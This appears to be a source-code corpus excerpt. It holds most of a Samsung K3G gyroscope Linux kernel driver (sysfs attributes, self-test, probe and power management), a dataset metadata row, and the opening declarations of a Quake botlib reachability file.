CTRL_REG1, 0x00);
if (err < 0)
{
printk(KERN_INFO "%s: line %d - i2c error\n", __func__, __LINE__);
goto unlock;
}
}
k3g_data->enable = new_enable;
turn_off:
if (err < 0)
i2c_smbus_write_byte_data(k3g_data->client,
CTRL_REG1, 0x00);
unlock:
mutex_unlock(&k3g_data->lock);
return err ? err : size;
}
#ifdef FILE_OPS
static int k3g_misc_open(struct inode *inode, struct file *file)
{
int err;
err = nonseekable_open(inode, file);
if (err < 0)
return err;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line:%d",__func__, __LINE__);
file->private_data = NULL;
return 0;
}
static long k3g_misc_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
void __user *argp = (void __user *)arg;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: %s call with cmd 0x%x and arg 0x%x\n",
DRV_NAME, __func__, cmd, (unsigned int)arg);
switch (cmd) {
case K3G_IOCTL_READ_DATA_XYZ:
if (copy_to_user(argp, k3g_gyro_data, sizeof(int)*3)){
printk(KERN_ERR "%s: %s error in copy_to_user \n",
DRV_NAME, __func__);
return -EINVAL;
}
break;
default:
return -EINVAL;
}
return 0;
}
static const struct file_operations k3g_misc_fops = {
.owner = THIS_MODULE,
.open = k3g_misc_open,
.unlocked_ioctl = k3g_misc_ioctl,
};
static struct miscdevice k3g_misc_device = {
.minor = MISC_DYNAMIC_MINOR,
.name = DRV_NAME "_misc",
.fops = &k3g_misc_fops,
};
#endif
static ssize_t k3g_show_gyro_data(struct device *dev,
struct device_attribute *attr, char *buf)
{
char strbuf[256];
struct k3g_data *k3g_data = dev_get_drvdata(dev);
if(DEBUG_DEBUG_SYSFS & debug_mask)
{
if(k3g_data->enable)
printk(KERN_INFO "%s: %d, %d, %d\n", __func__, k3g_gyro_data[0], k3g_gyro_data[1], k3g_gyro_data[2]);
else
printk(KERN_INFO "%s: %d, %d, %d\n", __func__, -1, -1, -1);
}
if(k3g_data->enable)
sprintf(strbuf, "%d %d %d", k3g_gyro_data[0], k3g_gyro_data[1], k3g_gyro_data[2]);
else
sprintf(strbuf, "%d %d %d", -1, -1, -1);
return sprintf(buf, "%s\n", strbuf);
}
static ssize_t k3g_show_delay(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct k3g_data *k3g_data = dev_get_drvdata(dev);
u64 delay;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
delay = k3g_data->time_to_read * k3g_data->entries;
delay = ktime_to_ns(ns_to_ktime(delay));
return sprintf(buf, "%lld\n", delay);
}
static ssize_t k3g_set_delay(struct device *dev,
struct device_attribute *attr, const char *buf, size_t size)
{
struct k3g_data *k3g_data = dev_get_drvdata(dev);
int odr_value = ODR105_BW25;
int res = 0;
int i;
u64 delay_ns;
u8 ctrl;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
res = strict_strtoll(buf, 10, &delay_ns);
if (res < 0)
return res;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
mutex_lock(&k3g_data->lock);
if (!k3g_data->interruptible)
hrtimer_cancel(&k3g_data->timer);
else
disable_irq(k3g_data->client->irq);
/* round to the nearest supported ODR that is less than
* the requested value
*/
for (i = 0; i < ARRAY_SIZE(odr_delay_table); i++)
if (delay_ns <= odr_delay_table[i].delay_ns)
{
odr_value = odr_delay_table[i].odr;
delay_ns = odr_delay_table[i].delay_ns;
k3g_data->time_to_read = delay_ns;
k3g_data->entries = 1;
break;
}
if (delay_ns >= odr_delay_table[3].delay_ns)
{
if (delay_ns >= MAX_DELAY)
{
k3g_data->entries = MAX_ENTRY;
delay_ns = MAX_DELAY;
}
else
{
do_div(delay_ns, odr_delay_table[3].delay_ns);
k3g_data->entries = delay_ns;
}
k3g_data->time_to_read = odr_delay_table[3].delay_ns;
}
if (odr_value != (k3g_data->ctrl_regs[0] & ODR_MASK)) {
ctrl = (k3g_data->ctrl_regs[0] & ~ODR_MASK);
ctrl |= odr_value;
k3g_data->ctrl_regs[0] = ctrl;
res = i2c_smbus_write_byte_data(k3g_data->client,
CTRL_REG1, ctrl);
}
/* we see a noise in the first sample or two after we
* change rates. this delay helps eliminate that noise.
*/
msleep((u32)delay_ns * 2 / NSEC_PER_MSEC);
/* (re)start fifo */
k3g_restart_fifo(k3g_data);
if (!k3g_data->interruptible)
{
delay_ns = k3g_data->entries * k3g_data->time_to_read;
k3g_data->polling_delay = ns_to_ktime(delay_ns);
if (k3g_data->enable)
hrtimer_start(&k3g_data->timer,
k3g_data->polling_delay, HRTIMER_MODE_REL);
}
else
{
enable_irq(k3g_data->client->irq);
}
mutex_unlock(&k3g_data->lock);
return size;
}
#ifdef SELF_TEST_ENABLED
bool st_result = false;
static ssize_t k3g_show_st_result(struct device *dev,
struct device_attribute *attr, char *buf)
{
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_INFO "%s: st_result(%d)\n", __func__, st_result);
return sprintf(buf, "%d\n", st_result);
}
#define NUM_SAMPLE 5
#define K3G_ABS(a) (((a)<0)?-(a):(a))
static ssize_t k3g_run_self_test(struct device *dev,
struct device_attribute *attr, const char *buf, size_t size)
{
int err=0, i=0, j=0, tmp1=0, tmp2=0;
bool ret=0;
struct i2c_client *client = to_i2c_client(dev);
struct k3g_data *k3g_data = i2c_get_clientdata(client);
struct k3g_platform_data *pdata;
int out_nost_x[NUM_SAMPLE], out_nost_y[NUM_SAMPLE], out_nost_z[NUM_SAMPLE];
int avg_out_nost_x=0, avg_out_nost_y=0, avg_out_nost_z=0, sum_nost_x=0, sum_nost_y=0, sum_nost_z=0;
int out_st_x[NUM_SAMPLE], out_st_y[NUM_SAMPLE], out_st_z[NUM_SAMPLE];
int avg_out_st_x=0, avg_out_st_y=0, avg_out_st_z=0, sum_st_x=0, sum_st_y=0, sum_st_z=0;
mutex_lock(&k3g_data->lock);
pdata = client->dev.platform_data;
if(pdata == NULL) {
dev_err(&client->dev,
"failed to read platform data\n");
err = -ENOMEM;
goto exit_self_test;
}
/* 1. Initialize/Turn on/enable Sensor - set BDU=1, ODR=200HZ, Cut-Off Freq=5-Hz, FS=2000dps*/
err = i2c_smbus_write_byte_data(k3g_data->client,CTRL_REG1, 0x6f);
if(err < 0){
err = -EIO;
printk(KERN_ERR "[%s, %d] Error during writing 0x6f on CTRL_REG1\n", TAG_ST, __LINE__);
goto exit_self_test;
}
err = i2c_smbus_write_byte_data(k3g_data->client,CTRL_REG2, 0x00);
if(err < 0){
err = -EIO;
printk(KERN_ERR "[%s, %d] Error during writing 0x00 on CTRL_REG2\n",TAG_ST, __LINE__);
goto exit_self_test;
}
err = i2c_smbus_write_byte_data(k3g_data->client,CTRL_REG3, 0x00);
if(err < 0){
err = -EIO;
printk(KERN_ERR "[%s, %d] Error during writing 0x00 on CTRL_REG3\n",TAG_ST, __LINE__);
goto exit_self_test;
}
err = i2c_smbus_write_byte_data(k3g_data->client,CTRL_REG4, 0xa0);
if(err < 0){
err = -EIO;
printk(KERN_ERR "[%s, %d] Error during writing 0xa0 on CTRL_REG4\n", TAG_ST,__LINE__);
goto exit_self_test;
}
err = i2c_smbus_write_byte_data(k3g_data->client,CTRL_REG5, 0x02);
if(err < 0){
err = -EIO;
printk(KERN_ERR "[%s, %d] Error during writing 0x02 on CTRL_REG5\n",TAG_ST,__LINE__);
goto exit_self_test;
}
/* 2. Power up, wait for 800ms for stable output */
if(pdata->power_on){
pdata->power_on(1<<SENSOR_TYPE_GYROSCOPE);
mdelay(800);
}
while(i < NUM_SAMPLE)
{
tmp1=0;
tmp2=0;
if(i2c_smbus_read_byte_data(k3g_data->client, STATUS_REG) & ZYXDA_MASK){
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_INFO "[%s, %d] NOST read data #%d\n",TAG_ST,__LINE__,i);
tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_X_L);
tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_X_H);
out_nost_x[i] = (tmp2 << 8) | tmp1;
if(0x8000&out_nost_x[i])
out_nost_x[i] = (0x10000 - out_nost_x[i])*(-1);
tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Y_L);
tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Y_H);
out_nost_y[i] = (tmp2 << 8) | tmp1;
if(0x8000&out_nost_y[i])
out_nost_y[i] = (0x10000 - out_nost_y[i])*(-1);
tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Z_L);
tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Z_H);
out_nost_z[i] = (tmp2 << 8) | tmp1;
if(0x8000&out_nost_z[i])
out_nost_z[i] = (0x10000 - out_nost_z[i])*(-1);
i++;
} else {
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_INFO "[%s, %d] NOST ZYXDA ready bit is not set\n",TAG_ST,__LINE__);
mdelay(1);
}
}
/* calculate avg values for nost */
for(i=0; i<NUM_SAMPLE; i++)
{
sum_nost_x += out_nost_x[i];
sum_nost_y += out_nost_y[i];
sum_nost_z += out_nost_z[i];
if(DEBUG_DEV_STATUS & debug_mask)
{
printk(KERN_INFO "[%s, %d] sum_nost_x=(%d), out_nost_x[%d]=(%d)\n", TAG_ST, __LINE__, sum_nost_x, i, out_nost_x[i]);
printk(KERN_INFO "[%s, %d] sum_nost_y=(%d), out_nost_y[%d]=(%d)\n", TAG_ST, __LINE__, sum_nost_y, i, out_nost_y[i]);
printk(KERN_INFO "[%s, %d] sum_nost_z=(%d), out_nost_z[%d]=(%d)\n", TAG_ST, __LINE__, sum_nost_z, i, out_nost_z[i]);
}
}
avg_out_nost_x = sum_nost_x/NUM_SAMPLE;
avg_out_nost_y = sum_nost_y/NUM_SAMPLE;
avg_out_nost_z = sum_nost_z/NUM_SAMPLE;
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_INFO "[%s, %d] avg_out_nost_x(%d), avg_out_nost_y(%d), avg_out_nost_z(%d)\n", TAG_ST, __LINE__, avg_out_nost_x, avg_out_nost_y, avg_out_nost_z);
/* 3. Enable Self Test */
err = i2c_smbus_write_byte_data(k3g_data->client,CTRL_REG4, 0xa2);
if(err < 0){
err = -EIO;
printk(KERN_ERR "[%s, %d] Error during writing 0x02 on CTRL_REG5\n",TAG_ST,__LINE__);
goto exit_self_test;
}
mdelay(50);
while(j < NUM_SAMPLE)
{
tmp1=0;
tmp2=0;
if(i2c_smbus_read_byte_data(k3g_data->client, STATUS_REG) & ZYXDA_MASK){
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_INFO "[%s, %d] ST read data #%d\n",TAG_ST,__LINE__,j);
tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_X_L);
tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_X_H);
out_st_x[j] = (tmp2 << 8) | tmp1;
if(0x8000&out_st_x[j])
out_st_x[j] = (0x10000 - out_st_x[j])*(-1);
tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Y_L);
tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Y_H);
out_st_y[j] = (tmp2 << 8) | tmp1;
if(0x8000&out_st_y[j])
out_st_y[j] = (0x10000 - out_st_y[j])*(-1);
tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Z_L);
tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Z_H);
out_st_z[j] = (tmp2 << 8) | tmp1;
if(0x8000&out_st_z[j])
out_st_z[j] = (0x10000 - out_st_z[j])*(-1);
j++;
} else {
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_INFO "[%s, %d] ST ZYXDA ready bit is not set\n",TAG_ST,__LINE__);
mdelay(1);
}
}
/* calculate avg values for st */
for(j=0; j<NUM_SAMPLE; j++)
{
sum_st_x += out_st_x[j];
sum_st_y += out_st_y[j];
sum_st_z += out_st_z[j];
if(DEBUG_DEV_STATUS & debug_mask)
{
printk(KERN_INFO "[%s, %d] sum_st_x=(%d), out_st_x[%d]=(%d)\n", TAG_ST, __LINE__, sum_st_x, j, out_st_x[j]);
printk(KERN_INFO "[%s, %d] sum_st_y=(%d), out_st_y[%d]=(%d)\n", TAG_ST, __LINE__, sum_st_y, j, out_st_y[j]);
printk(KERN_INFO "[%s, %d] sum_st_z=(%d), out_st_z[%d]=(%d)\n", TAG_ST, __LINE__, sum_st_z, j, out_st_z[j]);
}
}
avg_out_st_x = sum_st_x/NUM_SAMPLE;
avg_out_st_y = sum_st_y/NUM_SAMPLE;
avg_out_st_z = sum_st_z/NUM_SAMPLE;
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_INFO "[%s, %d] avg_out_st_x(%d), avg_out_st_y(%d), avg_ouot_st_z(%d)\n",
TAG_ST, __LINE__, avg_out_st_x, avg_out_st_y, avg_out_st_z);
/* 4. decide pass/fail */
{
int tmpx=0, tmpy=0, tmpz=0;
tmpx = K3G_ABS(avg_out_st_x - avg_out_nost_x)*SENSITIVITY/1000;
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_INFO "[%s, %d] tmpx(%d)=(%d*0.001)*|avg_out_st_x(%d)-avg_out_nost_x(%d)|\n",
TAG_ST,__LINE__, tmpx,SENSITIVITY, avg_out_st_x,avg_out_nost_x);
if(MIN_ST_X <= tmpx && tmpx <= MAX_ST_X){
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_ERR "[%s, %d] Pass, ST_X, (%d)<=(%d)<=(%d)\n",TAG_ST,__LINE__, MIN_ST_X, tmpx, MAX_ST_X);
ret = true;
} else {
printk(KERN_ERR "[%s, %d] False, ST_X, (%d)<=(%d)<=(%d)\n",TAG_ST,__LINE__, MIN_ST_X, tmpx, MAX_ST_X);
ret = false;
goto exit_self_test;
}
tmpy = K3G_ABS(avg_out_st_y - avg_out_nost_y)*SENSITIVITY/1000;
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_INFO "[%s, %d] tmpy(%d)=(%d*0.001)*|avg_out_st_y(%d)-avg_out_nost_y(%d)|\n",
TAG_ST,__LINE__, tmpy,SENSITIVITY,avg_out_st_y,avg_out_nost_y);
if(MIN_ST_Y <= tmpy && tmpy <= MAX_ST_Y){
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_ERR "[%s, %d] Pass, ST_Y, (%d)<=(%d)<=(%d)\n",TAG_ST,__LINE__, MIN_ST_Y, tmpy, MAX_ST_Y);
ret = true;
} else {
printk(KERN_ERR "[%s, %d] False, ST_Y, (%d)<=(%d)<=(%d)\n",TAG_ST,__LINE__, MIN_ST_Y, tmpy, MAX_ST_Y);
ret = false;
goto exit_self_test;
}
tmpz = K3G_ABS(avg_out_st_z - avg_out_nost_z)*SENSITIVITY/1000;
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_INFO "[%s, %d] tmpz(%d)=(%d*0.001)*|avg_out_st_z(%d)-avg_out_nost_z(%d)|\n",
TAG_ST,__LINE__, tmpz, SENSITIVITY,avg_out_st_z,avg_out_nost_z);
if(MIN_ST_Z <= tmpz && tmpz <= MAX_ST_Z){
if(DEBUG_DEV_STATUS & debug_mask)
printk(KERN_ERR "[%s, %d] Pass, ST_Z, (%d)<=(%d)<=(%d)\n",TAG_ST,__LINE__, MIN_ST_Z, tmpz, MAX_ST_Z);
ret = true;
} else {
printk(KERN_ERR "[%s, %d] False, ST_Z, (%d)<=(%d)<=(%d)\n",TAG_ST,__LINE__, MIN_ST_Z, tmpz, MAX_ST_Z);
ret = false;
goto exit_self_test;
}
}
printk(KERN_INFO "[%s, %d] Finally Pass!!!\n",TAG_ST,__LINE__);
ret = true;
exit_self_test:
/* Disable Sensor */
err = i2c_smbus_write_byte_data(k3g_data->client,CTRL_REG1, 0x00);
if(err < 0){
err = -EIO;
printk(KERN_ERR "[%s, %d] exit: Error during writing 0x02 on CTRL_REG5\n",TAG_ST,__LINE__);
}
/* Disable Self Test */
err = i2c_smbus_write_byte_data(k3g_data->client,CTRL_REG4, 0x00);
if(err < 0){
err = -EIO;
printk(KERN_ERR "[%s, %d] exit: Error during writing 0x02 on CTRL_REG5\n",TAG_ST,__LINE__);
}
mutex_unlock(&k3g_data->lock);
st_result = ret;
return err ? err : size;
}
#endif
static ssize_t k3g_show_report_cnt(struct device *dev, struct device_attribute *attr, char *buf)
{
struct k3g_data *k3g_data = dev_get_drvdata(dev);
printk(KERN_INFO "%s: report_cnt: %d\n", __func__, report_cnt);
if( k3g_data->enable)
return sprintf(buf, "%d\n", report_cnt);
else
return sprintf(buf, "%d\n", -1);
}
static DEVICE_ATTR(enable, /*S_IRUGO | S_IWUSR | S_IWGRP,*/S_IRUGO|S_IWUSR,
k3g_show_enable, k3g_set_enable);
static DEVICE_ATTR(poll_delay, /*S_IRUGO | S_IWUSR | S_IWGRP,*/S_IRUGO|S_IWUSR,
k3g_show_delay, k3g_set_delay);
static DEVICE_ATTR(gyro_data, /*S_IRUGO | S_IWUSR | S_IWGRP,*/S_IRUGO|S_IWUSR,
k3g_show_gyro_data, NULL);
static DEVICE_ATTR(gyro_cnt, /*S_IRUGO | S_IWUSR | S_IWGRP,*/S_IRUGO|S_IWUSR,
k3g_show_report_cnt, NULL);
#ifdef SELF_TEST_ENABLED
static DEVICE_ATTR(self_test, S_IRUGO | S_IWUSR | S_IWGRP,
k3g_show_st_result, k3g_run_self_test);
static struct attribute *k3g_attributes[] =
{
&dev_attr_enable.attr,
&dev_attr_poll_delay.attr,
#ifdef SELF_TEST_ENABLED
&dev_attr_self_test.attr,
#endif
&dev_attr_gyro_data.attr,
&dev_attr_gyro_cnt.attr,
NULL
};
static const struct attribute_group k3g_attr_group =
{
.attrs = k3g_attributes,
};
#endif
static int k3g_probe(struct i2c_client *client,
const struct i2c_device_id *devid)
{
int ret;
int err = 0;
struct k3g_data *data;
struct k3g_platform_data *pdata;
struct input_dev *input_dev;
if (client->dev.platform_data == NULL) {
dev_err(&client->dev, "platform data is NULL. exiting.\n");
err = -ENODEV;
goto exit;
}
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d", __func__, __LINE__);
k3g_i2c_client = client;
/* device data setting */
pdata = client->dev.platform_data;
if(pdata == NULL)
{
dev_err(&client->dev,
"failed to read platform data\n");
err = -ENOMEM;
goto exit;
}
data = kzalloc(sizeof(*data), GFP_KERNEL);
if (data == NULL) {
dev_err(&client->dev,
"failed to allocate memory for module data\n");
err = -ENOMEM;
goto exit;
}
data->client = client;
if(pdata->power_on){
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d, call power_on", __func__, __LINE__);
pdata->power_on(1<<SENSOR_TYPE_GYROSCOPE);
mdelay(1);
}
#ifdef SELF_TEST_ENABLED
err = sysfs_create_group(&client->dev.kobj, &k3g_attr_group);
if (err) {
printk(KERN_ERR "Unable to do sysfs_create_group");
goto exit;
}
#endif
/* read chip id */
ret = i2c_smbus_read_byte_data(client, WHO_AM_I);
if (ret != DEVICE_ID) {
if (ret < 0) {
pr_err("%s: i2c for reading chip id failed\n",
__func__);
err = ret;
} else {
pr_err("%s : Device identification failed\n",
__func__);
err = -ENODEV;
}
goto err_read_reg;
}
mutex_init(&data->lock);
/* allocate gyro input_device */
input_dev = input_allocate_device();
if (!input_dev) {
pr_err("%s: could not allocate input device\n", __func__);
err = -ENOMEM;
goto err_input_allocate_device;
}
data->input_dev = input_dev;
input_set_drvdata(input_dev, data);
input_dev->name = "gyroscope";
/* X */
input_set_capability(input_dev, EV_REL, REL_RX);
input_set_abs_params(input_dev, REL_RX, -2048, 2047, 0, 0);
/* Y */
input_set_capability(input_dev, EV_REL, REL_RY);
input_set_abs_params(input_dev, REL_RY, -2048, 2047, 0, 0);
/* Z */
input_set_capability(input_dev, EV_REL, REL_RZ);
input_set_abs_params(input_dev, REL_RZ, -2048, 2047, 0, 0);
err = input_register_device(input_dev);
if (err < 0)
{
pr_err("%s: could not register input device\n", __func__);
input_free_device(data->input_dev);
goto err_input_register_device;
}
memcpy(&data->ctrl_regs, &default_ctrl_regs, sizeof(default_ctrl_regs));
if(pdata->power_off){
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d, call power_off", __func__, __LINE__);
pdata->power_off(1<<SENSOR_TYPE_GYROSCOPE);
}
if (data->client->irq >= 0)
{
/* interrupt */
data->interruptible = true;
err = request_threaded_irq(data->client->irq, NULL,
k3g_interrupt_thread, IRQF_TRIGGER_HIGH|IRQF_ONESHOT,
"k3g", data);
if (err < 0) {
pr_err("%s: can't allocate irq.\n", __func__);
goto err_request_irq;
}
disable_irq(data->client->irq);
}
else
{
/* polling */
u64 delay_ns;
data->ctrl_regs[2] = 0x00; /* disable interrupt */
/* hrtimer settings. we poll for gyro values using a timer. */
hrtimer_init(&data->timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
data->polling_delay = ns_to_ktime(10 * NSEC_PER_MSEC);
data->time_to_read = 10000000LL;
delay_ns = ktime_to_ns(data->polling_delay);
do_div(delay_ns, data->time_to_read);
data->entries = delay_ns;
data->timer.function = k3g_timer_func;
/* the timer just fires off a work queue request.
We need a thread to read i2c (can be slow and blocking). */
data->k3g_wq = create_singlethread_workqueue("k3g_wq");
if (!data->k3g_wq) {
err = -ENOMEM;
pr_err("%s: could not create workqueue\n", __func__);
goto err_create_workqueue;
}
/* this is the thread function we run on the work queue */
INIT_WORK(&data->work, k3g_work_func);
}
if (device_create_file(&input_dev->dev,
&dev_attr_enable) < 0) {
pr_err("Failed to create device file(%s)!\n",
dev_attr_enable.attr.name);
goto err_device_create_file;
}
if (device_create_file(&input_dev->dev,
&dev_attr_poll_delay) < 0) {
pr_err("Failed to create device file(%s)!\n",
dev_attr_poll_delay.attr.name);
goto err_device_create_file2;
}
#ifdef SELF_TEST_ENABLED
if (device_create_file(&input_dev->dev,
&dev_attr_self_test) < 0) {
pr_err("Failed to create device file(%s)!\n",
dev_attr_self_test.attr.name);
goto err_device_create_file3;
}
#endif
if (device_create_file(&input_dev->dev,
&dev_attr_gyro_data) < 0) {
pr_err("Failed to create device file(%s)!\n",
dev_attr_gyro_data.attr.name);
goto err_device_create_file4;
}
if (device_create_file(&input_dev->dev,
&dev_attr_gyro_cnt) < 0) {
pr_err("Failed to create device file(%s)!\n",
dev_attr_gyro_cnt.attr.name);
goto err_device_create_file8;
}
#ifdef FILE_OPS
err = misc_register(&k3g_misc_device);
if (err < 0)
{
dev_err(&client->dev,
"misc device register failed\n");
goto err_device_create_file2;
}
#endif
i2c_set_clientdata(client, data);
dev_set_drvdata(&input_dev->dev, data);
return 0;
err_device_create_file8:
device_remove_file(&input_dev->dev, &dev_attr_gyro_cnt);
err_device_create_file4:
device_remove_file(&input_dev->dev, &dev_attr_gyro_data);
#ifdef SELF_TEST_ENABLED
err_device_create_file3:
device_remove_file(&input_dev->dev, &dev_attr_self_test);
#endif
err_device_create_file2:
device_remove_file(&input_dev->dev, &dev_attr_enable);
err_device_create_file:
if (data->interruptible) {
enable_irq(data->client->irq);
free_irq(data->client->irq, data);
} else
destroy_workqueue(data->k3g_wq);
input_unregister_device(data->input_dev);
err_create_workqueue:
err_request_irq:
err_input_register_device:
err_input_allocate_device:
mutex_destroy(&data->lock);
err_read_reg:
kfree(data);
exit:
return err;
}
static int k3g_remove(struct i2c_client *client)
{
int err = 0;
struct k3g_data *k3g_data = i2c_get_clientdata(client);
device_remove_file(&k3g_data->input_dev->dev, &dev_attr_enable);
device_remove_file(&k3g_data->input_dev->dev, &dev_attr_poll_delay);
device_remove_file(&k3g_data->input_dev->dev, &dev_attr_gyro_data);
device_remove_file(&k3g_data->input_dev->dev, &dev_attr_gyro_cnt);
#ifdef SELF_TEST_ENABLED
device_remove_file(&k3g_data->input_dev->dev, &dev_attr_self_test);
#endif
#ifdef FILE_OPS
misc_deregister(&k3g_misc_device);
#endif
if (k3g_data->enable)
err = i2c_smbus_write_byte_data(k3g_data->client,
CTRL_REG1, 0x00);
if (k3g_data->interruptible) {
if (!k3g_data->enable) /* no disable_irq before free_irq */
enable_irq(k3g_data->client->irq);
free_irq(k3g_data->client->irq, k3g_data);
} else {
hrtimer_cancel(&k3g_data->timer);
cancel_work_sync(&k3g_data->work);
destroy_workqueue(k3g_data->k3g_wq);
}
input_unregister_device(k3g_data->input_dev);
mutex_destroy(&k3g_data->lock);
kfree(k3g_data);
return err;
}
static int k3g_suspend(struct device *dev)
{
int err = 0;
struct i2c_client *client = to_i2c_client(dev);
struct k3g_data *k3g_data = i2c_get_clientdata(client);
struct k3g_platform_data *pdata;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
pdata = client->dev.platform_data;
if (k3g_data->enable) {
mutex_lock(&k3g_data->lock);
if (!k3g_data->interruptible) {
hrtimer_cancel(&k3g_data->timer);
cancel_work_sync(&k3g_data->work);
flush_workqueue(k3g_data->k3g_wq);
}
err = i2c_smbus_write_byte_data(k3g_data->client,
CTRL_REG1, 0x00);
mutex_unlock(&k3g_data->lock);
}
if(pdata->power_off){
if(DEBUG_GEN_INFO & debug_mask)
printk(KERN_INFO "%s: goes to suspend, power off\n", __func__);
pdata->power_off(1<<SENSOR_TYPE_GYROSCOPE);
}
return err;
}
static int k3g_resume(struct device *dev)
{
int err = 0;
struct i2c_client *client = to_i2c_client(dev);
struct k3g_data *k3g_data = i2c_get_clientdata(client);
struct k3g_platform_data *pdata;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
pdata = client->dev.platform_data;
if (pdata->power_on){
if(DEBUG_GEN_INFO & debug_mask)
printk(KERN_INFO "%s: goes to resume, power on\n", __func__);
pdata->power_on(1<<SENSOR_TYPE_GYROSCOPE);
mdelay(1);
}
if (k3g_data->enable) {
mutex_lock(&k3g_data->lock);
mdelay(300);
k3g_restart_fifo(k3g_data);
if (!k3g_data->interruptible)
hrtimer_start(&k3g_data->timer,
k3g_data->polling_delay, HRTIMER_MODE_REL);
err = i2c_smbus_write_i2c_block_data(client,
CTRL_REG1 | AC, sizeof(k3g_data->ctrl_regs),
k3g_data->ctrl_regs);
mutex_unlock(&k3g_data->lock);
}
return err;
}
static const struct dev_pm_ops k3g_pm_ops = {
.suspend = k3g_suspend,
.resume = k3g_resume
};
static const struct i2c_device_id k3g_id[] = {
{ "k3g", 0 },
{ }
};
MODULE_DEVICE_TABLE(i2c, k3g_id);
static struct i2c_driver k3g_driver = {
.probe = k3g_probe,
.remove = __devexit_p(k3g_remove),
.id_table = k3g_id,
.driver = {
.pm = &k3g_pm_ops,
.owner = THIS_MODULE,
.name = "k3g"
},
};
static int __init k3g_init(void)
{
int ret;
ret = i2c_add_driver(&k3g_driver);
if ( ret != 0 ) {
printk(KERN_INFO "can not add i2c driver\n");
}
return ret;
}
static void __exit k3g_exit(void)
{
i2c_del_driver(&k3g_driver);
}
module_init(k3g_init);
module_exit(k3g_exit);
MODULE_DESCRIPTION("k3g digital gyroscope driver");
MODULE_AUTHOR("Tim SK Lee Samsung Electronics <tim.sk.lee@samsung.com>");
MODULE_LICENSE("GPL");
| gpl-2.0 |
MrDinnertime/Cvar-Unlocker | codemp/botlib/be_aas_reach.cpp | 4 | 151377 |
/*****************************************************************************
* name: be_aas_reach.c
*
* desc: reachability calculations
*
* $Archive: /MissionPack/code/botlib/be_aas_reach.c $
* $Author: Ttimo $
* $Revision: 12 $
* $Modtime: 4/21/01 9:15a $
* $Date: 4/21/01 9:15a $
*
*****************************************************************************/
#include "qcommon/q_shared.h"
#include "l_log.h"
#include "l_memory.h"
#include "l_script.h"
#include "l_libvar.h"
#include "l_precomp.h"
#include "l_struct.h"
#include "aasfile.h"
#include "botlib.h"
#include "be_aas.h"
#include "be_aas_funcs.h"
#include "be_aas_def.h"
extern int Sys_MilliSeconds(void);
extern botlib_import_t botimport;
//#define REACH_DEBUG
//NOTE: all travel times are in hundreth of a second
//maximum number of reachability links
#define AAS_MAX_REACHABILITYSIZE 65536
//number of areas reachability is calculated for each frame
#define REACHABILITYAREASPERCYCLE 15
//number of units reachability points are placed inside the areas
#define INSIDEUNITS 2
#define INSIDEUNITS_WALKEND 5
#define INSIDEUNITS_WALKSTART 0.1
#define INSIDEUNITS_WATERJUMP 15
//area flag used for weapon jumping
#define AREA_WEAPONJUMP 8192 //valid area to weapon jump to
//number of reachabilities of each type
int reach_swim; //swim
int reach_equalfloor; //walk on floors with equal height
int reach_step; //step up
int reach_walk; //walk of step
int reach_barrier; //jump up to a barrier
int reach_waterjump; //jump out of water
int reach_walkoffledge; //walk of a ledge
int reach_jump; //jump
int reach_ladder; //climb or descent a ladder
int reach_teleport; //teleport
int reach_elevator; //use an elevator
int reach_funcbob; //use a func bob
int reach_grapple; //grapple hook
int reach_doublejump; //double jump
int reach_rampjump; //ramp jump
int reach_strafejump; //strafe jump (just normal jump but further)
int reach_rocketjump; //rocket jump
int reach_bfgjump; //bfg jump
int reach_jumppad; //jump pads
//if true grapple reachabilities are skipped
int calcgrapplereach;
//linked reachability
typedef struct aas_lreachability_s
{
int areanum; //number of the reachable area
int facenum; //number of the face towards the other area
int edgenum; //number of the edge towards the other area
vec3_t start; //start point of inter area movement
vec3_t end; //end point of inter area movement
int traveltype; //type of travel required to get to the area
unsigned short int traveltime; //travel time of the inter area movement
//
struct aas_lreachability_s *next;
} aas_lreachability_t;
//temporary reachabilities
aas_lreachability_t *reachabilityheap; //heap with reachabilities
aas_lreachability_t *nextreachability; //next free reachability from the heap
aas_lreachability_t **areareachability; //reachability links for every area
int numlreachabilities;
